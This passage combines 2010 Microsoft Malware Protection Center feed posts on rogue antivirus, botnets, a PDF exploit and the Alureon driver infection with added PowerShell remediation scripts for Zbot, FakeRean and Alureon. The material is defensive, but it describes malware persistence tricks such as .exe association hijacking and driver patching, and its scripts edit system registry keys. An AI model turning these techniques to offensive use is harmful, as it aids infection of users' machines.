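    New-ItemProperty -Path $sm -Name PendingFileRenameOperations -PropertyType MultiString -Value ([string[]]$new) -Force | Out-Null
}

$extra = @(Get-SuspiciousUserinitEntries)
if ($extra.Count -gt 0) {
    "Userinit hook: $($extra -join ', ')"
    Get-ZbotUidMarker
    Get-ZbotDroppedFiles
    # Zbot guards the Userinit value while it runs, so queue the rename, reboot, then
    # submit the renamed .ex_ file for analysis. Uncomment to act:
    # $extra | ForEach-Object { Add-RenameOnReboot -Path $_ }
} else {
    'No extra Userinit entry found.'
}
```

Two things the REG ADD in the post does not cover: a bare REG ADD replaces whatever PendingFileRenameOperations already held (a pending Windows Update rename, for instance), and Zbot's injected code guards the Userinit value, so the registry edit only takes effect after the reboot that the rename also needs. The script reports first and leaves the rename commented out so the file can be copied off for analysis before it is touched.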
<item><title>Win32/FakeRean is 33 rogues in 1</title><description>Secuobs.com : 2010-03-10 04:51:39 - Microsoft Malware Protection Center - Back in August 2009 we added a rogue called Win32/FakeRean to the list of families removed by MSRT. At the time, I wrote about how it used several different names, like Home Antivirus 2010 and PC Antispyware 2010, which all looked pretty much the same. This is a trick used by most modern rogues; I covered it in some detail in my presentation at the Virus Bulletin conference last September. Alongside the use of different names, we have seen some rogues introduce different versions for different operating systems. FakeRean now uses individual names and looks for Windows XP, Windows Vista and Windows 7; however, rather than distribute multiple versions for each of these three platforms, FakeRean's creators have taken an all-in-one approach. The latest version of FakeRean chooses randomly from a list of 11 names each time it is installed. It then inserts a string into the name that depends on which version of Windows it is running on. The result is that a single version of the rogue can use any one of 33 different names:

Windows 7                    | Windows Vista                  | Windows XP
Win 7 Internet Security 2010 | Vista Internet Security 2010   | XP Internet Security 2010
Win 7 Internet Security      | Vista Internet Security        | XP Internet Security
Win 7 Antivirus Pro 2010     | Vista Antivirus Pro 2010       | XP Antivirus Pro 2010
Win 7 Antivirus Pro          | Vista Antivirus Pro            | XP Antivirus Pro
Win 7 Antivirus 2010         | Vista Antivirus 2010           | XP Antivirus 2010
Win 7 Antivirus              | Vista Antivirus                | XP Antivirus
Win 7 Defender 2010          | Vista Defender 2010            | XP Defender 2010
Win 7 Guardian               | Vista Guardian                 | XP Guardian
Win 7 Guardian 2010          | Vista Guardian 2010            | XP Guardian 2010
Antivirus Win 7 2010         | Antivirus Vista 2010           | Antivirus XP 2010
Win 7 Antispyware 2010       | Vista Antispyware 2010         | XP Antispyware 2010

Along with each name comes a slightly different user interface to match, but for the most part they are very similar. Here is the fake scanner on Windows XP: IMAGE (fake scanner displayed by Win32/FakeRean on XP systems). This is what it looks like on Windows 7: IMAGE (fake scanner displayed by Win32/FakeRean on Windows 7 systems). The exception is when it comes to interface elements that imitate parts of the operating system. On Windows XP, for example, FakeRean displays an imitation of Windows XP's Security Center: IMAGE (fake Windows Security Center displayed by Win32/FakeRean on systems running Windows XP). When running on Windows 7, it displays a fake copy of the Action Center: IMAGE (fake Action Center displayed by Win32/FakeRean on systems running Windows 7). (Note that the above screenshots and the list of names are all from one sample of FakeRean, SHA1 4fbd83a86dbefa058f3f33c4b950159b8882635a.) This is another example of the increasing sophistication of this type of malware. FakeRean has also introduced another way of ensuring it is automatically started: it modifies the registry to associate .exe files with its own executable, so the rogue is run whenever any program is launched. Unlike other rogues, such as Win32/FakeScanti, it doesn't just use this technique to block other programs from running; if the rogue is removed without restoring the registry, .exe files can no longer be run at all. The EXE file extension needs to be re-associated in order to restore normal functionality. Please see our encyclopedia entry for further detail. -Hamish O'Dea IMAGE </description><link>http://www.secuobs.com/revue/news/200107.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/200107.shtml</guid></item>
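The .exe association hijack described in the post above, as an added PowerShell example that is not part of the original post: it reads the class that HKCR\.exe currently maps to and the open command registered for that class, flags anything other than the Windows default (class exefile, command "%1" %*), and restores that default. The registry locations and the default command string are standard Windows values; the function names are this example's own, and because the post does not say which command string FakeRean writes, the check compares against the known-good default rather than a known-bad value. Start PowerShell from a command prompt on an affected machine: cmd.exe launches executables with CreateProcess and does not consult the shell association the rogue broke.

```powershell
# Added example, not from the MMPC post: inspect and restore the .exe file association
# that FakeRean hijacks. Windows defaults: HKCR\.exe maps to the class "exefile", and
# HKCR\exefile\shell\open\command is "%1" %*. Function names are this example's own.

$ExeDefaultClass   = 'exefile'
$ExeDefaultCommand = '"%1" %*'

# HKCR is the merged view of HKCU\Software\Classes (which wins) and HKLM\Software\Classes,
# so reading it shows what the shell will actually run when any .exe is launched.
function Get-ExeAssociation {
    $class  = (Get-ItemProperty -Path 'Registry::HKEY_CLASSES_ROOT\.exe').'(default)'
    $cmdKey = "Registry::HKEY_CLASSES_ROOT\$class\shell\open\command"
    $cmd    = (Get-ItemProperty -Path $cmdKey -ErrorAction SilentlyContinue).'(default)'
    [pscustomobject]@{
        Class    = $class
        Command  = $cmd
        Hijacked = -not ($class -eq $ExeDefaultClass -and $cmd -eq $ExeDefaultCommand)
    }
}

# Restore the default: remove per-user overrides first (they take precedence), then
# reset the machine-wide mapping and command. Run elevated.
function Repair-ExeAssociation {
    foreach ($k in 'HKCU:\Software\Classes\.exe', "HKCU:\Software\Classes\$ExeDefaultClass") {
        if (Test-Path -LiteralPath $k) { Remove-Item -LiteralPath $k -Recurse -Force }
    }
    $ext = 'HKLM:\Software\Classes\.exe'
    $cmd = "HKLM:\Software\Classes\$ExeDefaultClass\shell\open\command"
    foreach ($k in $ext, $cmd) {
        if (-not (Test-Path -LiteralPath $k)) { New-Item -Path $k -Force | Out-Null }
    }
    Set-ItemProperty -LiteralPath $ext -Name '(default)' -Value $ExeDefaultClass
    Set-ItemProperty -LiteralPath $cmd -Name '(default)' -Value $ExeDefaultCommand
    Get-ExeAssociation      # re-read the merged view to confirm the repair
}

$before = Get-ExeAssociation
$before
if ($before.Hijacked) {
    "Class '$($before.Class)' currently runs: $($before.Command)"
    # Repair-ExeAssociation   # uncomment after recording the rogue's command line as evidence
}
```

Capturing the Command value before repairing it gives you the rogue's path for the rest of the cleanup; the repair only resets the mapping and leaves any extra class key the rogue registered in place, which is harmless once .exe no longer points at it.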
<item><title>MSRT: Helping us de-Helpud you</title><description>Secuobs.com : 2010-03-09 23:21:55 - Microsoft Malware Protection Center - Greetings, purveyors of the Internet! Welcome to another thrilling installment of "MSRT: Miami", aka "What's new in MSRT this month". It's Win32/Helpud. What, anti-climactic? Perhaps. However, that doesn't take away from the importance of this addition to MSRT: we're extending our coverage of online game password stealers. Now, Win32/Helpud is not new to the malware scene. It's been around for a couple of years now and consistently maintains a presence on our radars. You may recall Win32/Helpud was one of a few families that were linked with exploiting the MS08-078 Internet Explorer vulnerability back in the day. The fact that it's still lurking around almost 2 years later is one of the reasons we've decided to target Helpud with MSRT: it's not going away of its own accord. Why is that? Well, the main reason is because of how it's used. Helpud is a delivery mechanism used by other, affiliate, game password-stealers. We still see it because the business model is an effective one: give us your money, and we distribute and install your malware. Hardly original, but simple and (apparently) effective enough to keep the business afloat. "So what does this mean if MSRT finds Win32/Helpud on my machine?" I hear you ask. Well, many of these affiliate game password-stealers are already included in MSRT. How about that? Convenient, eh? Almost like it was pre-planned. Imagine that. However, as always, we still recommend our users install an antivirus solution (being wary of rogue scanners such as this one). Might I take this opportunity to shamelessly plug our offering of an effective antivirus product, Microsoft Security Essentials? Oh, I can. Thanks. Stay safe out there in the tubes, kids. Matt McCormack, MMPC Melbourne IMAGE </description><link>http://www.secuobs.com/revue/news/199952.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/199952.shtml</guid></item>
<item><title>CVE-2010-0188: Patched Adobe Reader Vulnerability is Actively Exploited in the Wild</title><description>Secuobs.com : 2010-03-09 09:04:42 - Microsoft Malware Protection Center - While recently analyzing a malicious PDF file, I noticed a vulnerability exploited by the sample which I had never encountered before. After a bit of research I came to the conclusion that this specific sample exploited CVE-2010-0188. This is a fresh vulnerability, information about which was just published this February. It is described as possibly leading to arbitrary code execution, which is exactly what is happening. When the PDF file is loaded, Adobe Reader opens and then closes, while an executable file named a.exe is dropped directly onto the C: drive. The dropped executable, which is actually embedded in the PDF file, tries to connect to a .biz registered domain to download other files. JavaScript is again used to successfully exploit this vulnerability, so disabling it for unknown documents might be a good idea. We currently detect the malicious file as Exploit:Win32/Pidief.AX (SHA1 908ae499a474e3006253417c658e055a633e75a1) and the dropped malware as TrojanDownloader:Win32/Qaantiz.A. Fortunately, Adobe has released an update to address the vulnerability, which is offered automatically to all users. Read Adobe's security bulletin and upgrade to the latest version of Adobe Reader and Acrobat. Users can pull down the Help menu and click Check for Updates to ensure that they are running the latest version. As good practice, we advise every user to always update their programs as well as their operating system. We also advise users not to open files whose origins they don't trust. Marian Radu, MMPC Dublin IMAGE </description><link>http://www.secuobs.com/revue/news/199666.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/199666.shtml</guid></item>
<item><title>In focus: Mariposa botnet</title><description>Secuobs.com : 2010-03-04 21:59:20 - Microsoft Malware Protection Center - In January this year, the MMPC added Win32/Rimecud to MSRT's removal capability. As previously discussed by Marian, this worm propagates mainly via removable devices, IM, and P2P channels, and utilizes backdoor functionality to communicate with a C&amp;C server. It differs from other bots in that it does not use a standard IRC protocol for its command and control functions. Between January and February this year the MSRT alone reported over 1 million distinct machines disinfected of this worm:

Family        | Threat count | Computers cleaned
Win32/Rimecud | 1,183,728    | 1,031,097

The Mariposa botnet criminals presumably use a number of different threats, but it appears to be primarily Win32/Rimecud. It is great to see our industry colleagues moving in the same direction to address these disruptive threats. Rimecud isn't particularly new, and the criminals apparently were trading their goodies at their counter. We first observed Win32/Rimecud in November 2008. IMAGE (Win32/Rimecud reports prior to inclusion in MSRT.) As a result of this monitoring and other assessment, we added Rimecud to the MSRT detection list in January. Here is what the MSRT has reported since January this year: IMAGE (Win32/Rimecud distribution per country/region according to MSRT.) The Mariposa botnet criminals also used Win32/Rimecud to further compromise controlled computers by installing additional malware. In reality, this was likely to include several different malware families, but it has been reported that Rimecud may at least have been used to download and install Win32/Tofsee. Microsoft antimalware products such as Microsoft Security Essentials detect this threat. Many thanks to my colleagues Patrick, Jimmy, and Joe for their insights on the threat event. Scott Wu -- MMPC IMAGE </description><link>http://www.secuobs.com/revue/news/198144.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/198144.shtml</guid></item>
<item><title>Waledac, Botnets and RSA</title><description>Secuobs.com : 2010-03-02 19:01:35 - Microsoft Malware Protection Center - By now you have likely seen multiple reports of Operation b49, which has targeted the Win32/Waledac botnet's command and control infrastructure. As I mentioned in my last blog, there is still more work that needs to be done in terms of cleaning up infected systems. Of course, Win32/Waledac is not the only botnet; even though we have taken positive steps in an attempt to neutralize this family of malicious software, there is still a need for additional action and cross-industry cooperation to combat these threats to Internet safety. It is interesting to observe the distribution of Waledac when considering the risk it may represent to your organization, as it differs significantly from previous heat maps that show the infection rates of all threats combined. There is a significantly higher degree of infection in the US and Europe, as well as moderately high infection rates in Australia, Brazil, and Canada, than we see in China, Japan and other parts of the Pacific Rim. IMAGE The scale shown in the heat map above is relative to itself and should not be taken to connote that one country is "safer" than another, since we are only displaying data about Win32/Waledac and not all threats. The scale in the bottom left corner ranges in infection rate from less than one computer per 100,000 to 26 computers per 100,000. These figures are well below the computers cleaned per thousand (CCM) metric for every country we discuss in the Security Intelligence Report (we are cleaning on the order of tens of millions of infected computers in a given year). In the period from January 2009 through the end of February 2010 we removed this threat from 182,340 computers, some of which were infected more than once or with more than one version of the threat (table). Since Win32/Waledac is distributed through email, generally with a lure based on a current holiday or other topical news item, a varied distribution is expected. It is also important to note that the number of computers infected is not the only aspect of the impact a threat can have. This threat has also been responsible for significant levels of spam. Estimates put the spam capacity Waledac could deliver at 1.5 billion messages per day; more than 651 million connection attempts were made to Hotmail between December 3 and December 21, 2009, each of which would be capable of delivering hundreds or even thousands of unsolicited emails. Additionally, the impact of credential theft, theft of email addresses in an infected computer's address book and other risks compound the damage this threat is able to do. As we have reported in our Security Intelligence Reports, there has been an increase in botnet disinfections period over period, as illustrated in the chart below. Botnets vary widely in capability but generally are used by criminals for the distribution of malicious software, sending large volumes of spam, distributed denial of service attacks, theft of passwords and personal information, as well as to maintain a foothold on a large number of computers for future use, either directly or in a pay-for-service model through the underground economy. IMAGE Scott Charney will be discussing these threats, Operation b49 and more in his keynote today at RSA. Additionally, I will be speaking in more detail on botnets in general and Waledac specifically in the Microsoft Theater in the Expo hall at noon. I hope to see you there, as well as in the panel discussion at 1pm in Orange Room 307 (SIP-106), where Andrew Jacquith of Forrester Research will lead us in a lively discussion of Security Intelligence Reporting. You can also find more information on our efforts towards End to End Trust and how we aspire to a safer, more trusted Internet. As crime on the Internet evolves in complexity and volume, we must fight these threats more creatively and aggressively, both directly and through cross-industry partnerships, to make the Internet safer for all of us. --Jeff Williams IMAGE </description><link>http://www.secuobs.com/revue/news/197199.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/197199.shtml</guid></item>
<item><title>Dismantling Waledac</title><description>Secuobs.com : 2010-02-25 22:18:34 - Microsoft Malware Protection Center - Today, you may have read in the Wall Street Journal about an operation Microsoft has been conducting against the Win32/Waledac botnet. If you haven't already seen the article, you can find additional information in the Microsoft on the Issues blog. In summary, the Microsoft Digital Crimes Unit, with support from the Microsoft Malware Protection Center, has taken legal and technical steps in an attempt to disable the command and control infrastructure of Waledac in order to prevent the criminals responsible from issuing new instructions. Win32/Waledac is used primarily to send spam. It also has the ability to download and execute arbitrary files, harvest email addresses from the local machine, perform denial of service attacks, proxy network traffic and steal passwords. The impact posed by such an infection is, as a result, quite broad. The method used for this takedown activity is rather novel and involves both legal and technical aspects. On Monday, Microsoft filed a complaint in the US District Court for the Eastern District of Virginia, and the court granted a temporary restraining order against 277 domains believed to be associated with Waledac and under the control of the criminals responsible. With this TRO we have been able to suspend these domains from the Internet and, as a byproduct of this suspension, impact the ability of the criminal operators of the botnet to issue new commands or updates. Additional technical measures are being employed to further reduce peer-to-peer communications, and we are working with the security community to mitigate and respond to this botnet. While the disruption of the command and control of Waledac is a positive thing, this does not, by itself, address the tens of thousands of computers which are still infected with the threat, which are estimated to have been responsible for as many as 1.5 billion spam messages per day. As we previously reported in our most recent Security Intelligence Report, covering the second half of 2009, Microsoft technologies such as the Malicious Software Removal Tool and Microsoft Security Essentials were used to remove more than 96,000 instances of this threat, making it the 11th most prevalent during that period. As we have in the past, we encourage our customers to run an up-to-date anti-virus program from a trusted source and to stay up to date with security updates from Microsoft using Automatic Update, as well as staying up to date on third-party software. If you are not already running up-to-date anti-virus, we would ask that you do this now to assist in containing this, and other, threats. We're not done. Stay tuned. -- Jeff Williams IMAGE </description><link>http://www.secuobs.com/revue/news/195692.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/195692.shtml</guid></item>
<item><title>If it calls itself "Security Essentials 2010", then it's possibly fake, innit?</title><description>Secuobs.com : 2010-02-25 09:57:47 - Microsoft Malware Protection Center - Well, it had to happen eventually. One of the oldest tricks used by rogue antivirus products is to use a similar name to, or have a similar look and feel to, legitimate security software. It has been commonplace for them to mimic the Windows Security Center. So it was inevitable that the day would arrive when a rogue would masquerade as something similar to Microsoft Security Essentials. If anything, it surprises me a little that it has taken so long. This one calls itself "Security Essentials 2010" and looks something like this: IMAGE (fake scanning interface displayed by Win32/Fakeinit). For the record, this is how the real Microsoft Security Essentials appears when it has detected a threat, in this case Win32/Fakeinit: IMAGE (real Microsoft Security Essentials scanning interface). As we in the MMPC have always been quick to point out, Microsoft Security Essentials can be downloaded and used without charge by users running genuine Windows, from http://www.microsoft.com/security_essentials. So anything mimicking Microsoft Security Essentials but asking for any sort of payment is clearly Up To No Good. IMAGE (activation dialog displayed by Win32/Fakeinit). We detect this imposter as Trojan:Win32/Fakeinit. Fakeinit's downloader not only installs the fake scanner component; it also monitors other running processes and attempts to terminate the ones it doesn't like, claiming that they are infected. IMAGE (fake warning alert displayed by Win32/Fakeinit). You can see a list of some of the terminated processes in the TrojanDownloader:Win32/Fakeinit description. Aside from this, it lowers a number of security settings in the registry, and changes the desktop background to display the following rather alarming message: IMAGE (desktop background set by Win32/Fakeinit). It also modifies the registry in an attempt to prevent this background from being changed again. Furthermore, it downloads and installs a Win32/Alureon component, and another Layered Service Provider (LSP) component, also detected as Trojan:Win32/Fakeinit. This LSP monitors the TCP traffic sent by the various Web browsers that the user might have installed, and blocks any traffic to certain domains, instead displaying the following: IMAGE (message displayed by Win32/Fakeinit when the affected user attempts to visit a specified domain). You can find a list of some of the blocked domains in the Trojan:Win32/Fakeinit description. - David Wood IMAGE </description><link>http://www.secuobs.com/revue/news/195467.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/195467.shtml</guid></item>
<item><title>News "parasites" on the prowl</title><description>Secuobs.com : 2010-02-22 06:10:36 - Microsoft Malware Protection Center - With the Winter Olympics in the news for the past couple of weeks, malware profiteers, as usual, are hard at work churning their "little greased wheels", looking to capitalize on any opportunity to get the slightest hint of public attention. Their strategy is simple: populate a malicious Web page with keywords that are likely to come up in news-related searches. The sooner such a page can be put up, the better chance it has of getting a high search engine ranking. Even though normally there aren't that many links to such pages from other sources, the fact that it has been published early enough might promise its placement in the top search results returned. In addition, while the large number of sources covering the event would normally push the malicious page down the search engine rankings, malware writers aim for a spike in the news activity, which narrows down the number of keywords from a larger, already popular set. An example of a Winter Olympic Games subset could be "gold medal short track skating" or something similar. The high ranking for the malicious page may be short lived, but sometimes it can linger "up in the charts" for days. That lingering popularity can be attributed to an early detection of the malware served by the page, which then gets referenced as a malicious source in security forums or other security-related sites. It happens that some of the sites link to the malicious page, inadvertently helping its popularity. (This is one reason why we do not publish URLs to malicious pages, and why elsewhere you often see contrived or deliberately broken URLs that might suggest, but not give access to, the page being discussed.) I stumbled on one such example that persistently seemed to appear: when the link is clicked, the attention of the user is drawn to somewhat typical scare tactics. IMAGE Regardless of the response, the page navigates to a fake representation of what appears to be the user's hard drive, seemingly infected with various sorts of malware. IMAGE Once again regardless of the response, the user is prompted with a dialog to download a binary file. IMAGE The binary itself (SHA1 e753a343ea58a4303ec259f2a971db3a508dd6a6) is detected as Trojan:Win32/Winwebsec by the latest Microsoft antivirus signatures. So far there does not seem to be an easy solution to dealing with malicious pages popping up related to recent popular news search keywords. So, as usual, stay vigilant to any suggestions to run an executable from an unverified source, and make sure that you use up-to-date antivirus definition files. -Oleg Petrovsky IMAGE </description><link>http://www.secuobs.com/revue/news/194032.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/194032.shtml</guid></item>
<item><title>Restart issues on an Alureon infected machine after MS10-015 is applied</title><description>Secuobs.com : 2010-02-18 05:49:16 - Microsoft Malware Protection Center - The Win32/Alureon family of malware is a complex set of components which perform various functions. These include the modification of DNS settings, search hijacking, and click fraud. Alureon has existed for several years and has undergone a number of evolutionary changes. The ability to "infect" the miniport driver associated with the hard disk of the operating system is a recent notable change. This functionality first appeared around August 2009. For the most common system configuration (machines using ATA hard disk drives), the ATA miniport driver, atapi.sys, is the file which is targeted. While the concept of modifying Windows system files as part of an installation method is not new, it is not a common approach. The file modification performed by Alureon overwrites the data in the target driver's resource section with its own code. The entry point of the driver is modified to point to this code. By doing so, the malicious code is executed when the driver is loaded by the operating system. (Note that this infection method is mitigated on the 64-bit versions of Windows from XP SP1 onwards because of a technology called Kernel Patch Protection, or PatchGuard.) In order to invoke a given Windows API, its virtual address (VA) must first be determined. This determination is generally taken care of by the operating system when an executable is loaded; the information required to perform this operation (the import table) is stored within the PE file itself. However, malware (and other software) often employs other methods to achieve this. In this case, rather than manipulate the structures required by the operating system, Alureon resolves the addresses it requires "manually". These are then stored as relative virtual addresses (RVAs) within the body of the modified driver. The figure below illustrates the code responsible for saving the RVA of the API ExAllocatePool at offset 0x14 from the start of the resource section. IMAGE The figure below is the start of the resource section of an infected driver. The stored RVA is 0x38d66. IMAGE Inspecting the VA, which is calculated by adding the RVA to the image base of the kernel, we observe the start of the API ExAllocatePool. IMAGE As part of the February security updates, an update (MS10-015) resolving a vulnerability in the Windows kernel was released. This update included a new operating system kernel. Inspecting the updated kernel at the same VA, we observe that this address no longer corresponds to the start of the ExAllocatePool API. IMAGE In the updated kernel, the VA of ExAllocatePool has changed. Therefore, after applying MS10-015, Alureon will be attempting to make an invalid call. The result of this attempted call is a blue screen or potential startup hang on 32-bit Windows systems, but reports have predominantly been on Windows XP. The author(s) of Alureon have since updated the driver infection routine. The latest version of Alureon (detected as Trojan:WinNT/Alureon.G) no longer relies on the use of hard-coded RVAs. Restart issues can be resolved by replacing an infected driver with the original. This can be performed from the Recovery Console. The top ten filenames reported in the wild: atapi.sys, iaStor.sys, nvata.sys, nvstor32.sys, nvstor.sys, nvgts.sys, nvatabus.sys, SiSRaid.sys, IdeChnDr.sys, iastorv.sys. For example, atapi.sys resides at the following location: %windir%\system32\drivers\atapi.sys. --Scott Molenkamp IMAGE </description><link>http://www.secuobs.com/revue/news/193071.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/193071.shtml</guid></item>
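The RVA comparison the post above walks through by hand, as an added PowerShell example that is not part of the original post: it reads the DWORD Alureon stores at offset 0x14 of the infected driver's resource section (the location the post gives), then walks the export directory of a chosen kernel image to see whether that RVA still lands on ExAllocatePool. Because the check is RVA against RVA it does not depend on the kernel's load address, which is the point of the post: the image base is only used to print the VA Alureon will actually call. The PE-walking helpers and the function names are this example's own, and the file paths are assumptions supplied by the caller; on a PAE or multiprocessor XP system compare against ntkrnlpa.exe or ntkrnlmp.exe, whichever is actually booted.

```powershell
# Added example, not from the MMPC post: compare the RVA an Alureon-infected driver
# stores at offset 0x14 of its resource section (per the post) against the RVA of
# ExAllocatePool exported by a given ntoskrnl.exe. The PE walking below is this
# example's own minimal parser; file paths are assumptions supplied by the caller.

function Read-U16 { param([byte[]]$B, [int]$O) [int][BitConverter]::ToUInt16($B, $O) }
function Read-U32 { param([byte[]]$B, [int]$O) [long][BitConverter]::ToUInt32($B, $O) }

# Just enough of the PE headers: image base, section table, export directory RVA.
function Get-PeInfo {
    param([byte[]]$Bytes)
    $nt = [int](Read-U32 $Bytes 0x3C)                       # e_lfanew
    if ((Read-U32 $Bytes $nt) -ne 0x4550) { throw 'not a PE image' }
    $nSections = Read-U16 $Bytes ($nt + 6)
    $optSize   = Read-U16 $Bytes ($nt + 20)
    $opt       = $nt + 24                                    # IMAGE_OPTIONAL_HEADER
    if ((Read-U16 $Bytes $opt) -eq 0x20B) {                  # PE32+ (64-bit)
        $imageBase = [BitConverter]::ToUInt64($Bytes, $opt + 24)
        $dirs      = $opt + 112
    } else {                                                 # PE32, the 32-bit case in the post
        $imageBase = [uint64](Read-U32 $Bytes ($opt + 28))
        $dirs      = $opt + 96
    }
    $sections = @()
    for ($i = 0; $i -lt $nSections; $i++) {
        $s = $opt + $optSize + 40 * $i                       # IMAGE_SECTION_HEADER
        $sections += [pscustomobject]@{
            Name     = [System.Text.Encoding]::ASCII.GetString($Bytes, $s, 8).TrimEnd([char]0)
            VirtSize = Read-U32 $Bytes ($s + 8)
            VirtAddr = Read-U32 $Bytes ($s + 12)
            RawSize  = Read-U32 $Bytes ($s + 16)
            RawPtr   = Read-U32 $Bytes ($s + 20)
        }
    }
    [pscustomobject]@{ ImageBase = $imageBase; ExportRva = (Read-U32 $Bytes $dirs); Sections = $sections }
}

# Map an RVA to a file offset through the section that contains it.
function Convert-RvaToOffset {
    param($Pe, [long]$Rva)
    foreach ($s in $Pe.Sections) {
        $size = [Math]::Max($s.VirtSize, $s.RawSize)
        if ($Rva -ge $s.VirtAddr -and $Rva -lt ($s.VirtAddr + $size)) {
            return [int]($Rva - $s.VirtAddr + $s.RawPtr)
        }
    }
    throw ('RVA 0x{0:X} is not backed by any section' -f $Rva)
}

# Walk IMAGE_EXPORT_DIRECTORY by name and return that export's RVA.
function Get-ExportRva {
    param([string]$Path, [string]$Name)
    $b  = [System.IO.File]::ReadAllBytes($Path)
    $pe = Get-PeInfo $b
    if ($pe.ExportRva -eq 0) { throw "$Path has no export table" }
    $exp      = Convert-RvaToOffset $pe $pe.ExportRva
    $nNames   = Read-U32 $b ($exp + 24)                      # NumberOfNames
    $funcs    = Convert-RvaToOffset $pe (Read-U32 $b ($exp + 28))   # AddressOfFunctions
    $names    = Convert-RvaToOffset $pe (Read-U32 $b ($exp + 32))   # AddressOfNames
    $ordinals = Convert-RvaToOffset $pe (Read-U32 $b ($exp + 36))   # AddressOfNameOrdinals
    for ($i = 0; $i -lt $nNames; $i++) {
        $nameOff = Convert-RvaToOffset $pe (Read-U32 $b ($names + 4 * $i))
        $end = $nameOff
        while ($b[$end] -ne 0) { $end++ }
        if ([System.Text.Encoding]::ASCII.GetString($b, $nameOff, $end - $nameOff) -eq $Name) {
            $ord = Read-U16 $b ($ordinals + 2 * $i)
            return [pscustomobject]@{ Name = $Name; Rva = (Read-U32 $b ($funcs + 4 * $ord)); ImageBase = $pe.ImageBase }
        }
    }
    throw "$Name is not exported by $Path"
}

# The DWORD Alureon leaves at resource-section offset 0x14 (0x38d66 in the post).
function Get-StoredRva {
    param([string]$DriverPath, [int]$Offset = 0x14)
    $b    = [System.IO.File]::ReadAllBytes($DriverPath)
    $rsrc = (Get-PeInfo $b).Sections | Where-Object { $_.Name -eq '.rsrc' }
    if (-not $rsrc) { throw "$DriverPath has no resource section" }
    Read-U32 $b ([int]$rsrc.RawPtr + $Offset)
}

function Test-AlureonRva {
    param([string]$DriverPath, [string]$KernelPath)
    $stored = Get-StoredRva $DriverPath
    $export = Get-ExportRva $KernelPath 'ExAllocatePool'
    [pscustomobject]@{
        StoredRva  = '0x{0:X}' -f $stored
        StoredVa   = '0x{0:X}' -f ($export.ImageBase + [uint64]$stored)   # what Alureon will call
        KernelRva  = '0x{0:X}' -f $export.Rva                             # where ExAllocatePool really is
        StillValid = ($stored -eq $export.Rva)
    }
}

# Example call (paths are assumptions): a saved copy of the infected atapi.sys against the
# installed kernel. Run once with the pre-MS10-015 kernel and once with the updated one
# to see StillValid flip from True to False.
# Test-AlureonRva -DriverPath 'C:\evidence\atapi.sys' -KernelPath "$env:windir\system32\ntoskrnl.exe"
```

Forwarded exports are not handled (ExAllocatePool is a real export in every kernel build, so they do not matter here), and a clean driver will simply yield whatever bytes happen to sit at 0x14 of its resource data, so the script is a confirmation step for a driver already flagged as infected, not a detector on its own.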
<item><title>Cupid Struck</title><description>Secuobs.com : 2010-02-11 03:07:10 - Microsoft Malware Protection Center - It's just a few more days before Valentine's Day. As most people now are already preparing their celebration, malware authors are also getting ready to use this popular event to target users with their malicious intent. Here's one example of a malicious file (2077ed17f0ad92dafb8fb7601570e06580e4b7f1) we've seen recently. Upon execution, it drops the following picture file greeting: [IMAGE] Note: it seems that the malware writers are using valid images from legitimate Web sites. Cute, isn't it? However, it does not just drop that Valentine related greeting, it also drops and executes the following file: 82.exe - detected as Backdoor:Win32/Bifrose.AE. Backdoor:Win32/Bifrose is a family of backdoor Trojans that allows a remote attacker to access a compromised computer. It usually drops a copy of the backdoor in the following folder: "bifrost", and it also creates the following registry entries: HKLM\SOFTWARE\Bifrost, HKCU\SOFTWARE\Bifrost. You can get more information about Backdoor:Win32/Bifrose.AE in our encyclopedia entry here. Please be very cautious in searching for those Valentine greetings on the Internet or opening greeting cards, even from your loved ones. You would want Cupid to strike your heart and not your computer. Advance Happy Valentine's Day, everyone! --Elda &amp; Francis</description><link>http://www.secuobs.com/revue/news/190762.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/190762.shtml</guid></item>
<item><title>MSRT February - When Push Comes to Shove</title><description>Secuobs.com : 2010-02-09 22:21:02 - Microsoft Malware Protection Center - This month we add another bot family to MSRT: Win32/Pushbot. Pushbot is, in many ways, an "old school" bot. It is controlled through IRC, it can distribute itself through several different channels and its source code is more or less open (for those who mix in certain circles). Like Win32/Rbot, Pushbot isn't one piece of malware that is updated and maintained by one group of malware writers, but rather a collection of malicious programs created by different people based on a common base of source code. The core code of Pushbot is based on something called Reptile, which dates back to 2005. Reptile, in turn, appears to have been based on Win32/Sdbot, just as Win32/Rbot was.

Because they are created and released by different people, the functionality can vary from one instance to the next; however, the basic features are universal. They are all IRC bots at heart, although each may be controlled through a different IRC server. They all spread in one way or another. Spreading via instant messaging applications such as AIM and Windows Live Messenger was one of the defining features of the Pushbot family, but many recent variants have this functionality disabled, i.e. the code is present in the malware, but never executed. Like other recent MSRT additions Hamweq and Rimecud, current Pushbots copy themselves to removable drives along with an autorun.inf file to attempt to launch the malware when the drive is connected to another machine. As David mentioned in his Hamweq blog, Windows 7 effectively ignores autorun.inf entries for removable drives apart from CDs and DVDs. Follow these instructions to update earlier versions of Windows to behave the same way.

Pushbot's raison d'être is the same as most bots': to control as many machines as possible. This control is mostly exploited by instructing infected machines to download other malware, which could be anything from password stealers to rogue security software. Some Pushbot variants can also be commanded to steal password information themselves, or launch distributed denial of service attacks.

-Hamish O'Dea</description><link>http://www.secuobs.com/revue/news/190190.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/190190.shtml</guid></item>
<item><title>Are you from an Internet cafe?</title><description>Secuobs.com : 2010-02-08 05:35:43 - Microsoft Malware Protection Center - In a previous blog, I mentioned a family of malware named Dogrobot, which attempts to penetrate the protection offered by particular hardware that is widely used in Internet cafés in China. Interestingly, we recently discovered a trojan, TrojanDownloader:Win32/Chekafe.A, that checks whether an affected machine is in an Internet café or not. If the affected machine is not from an Internet café, it sends the MAC address of the affected machine to a remote server. This led me to ask two questions: How does it check if the affected host is in an Internet café or not? Why does it require this particular information?

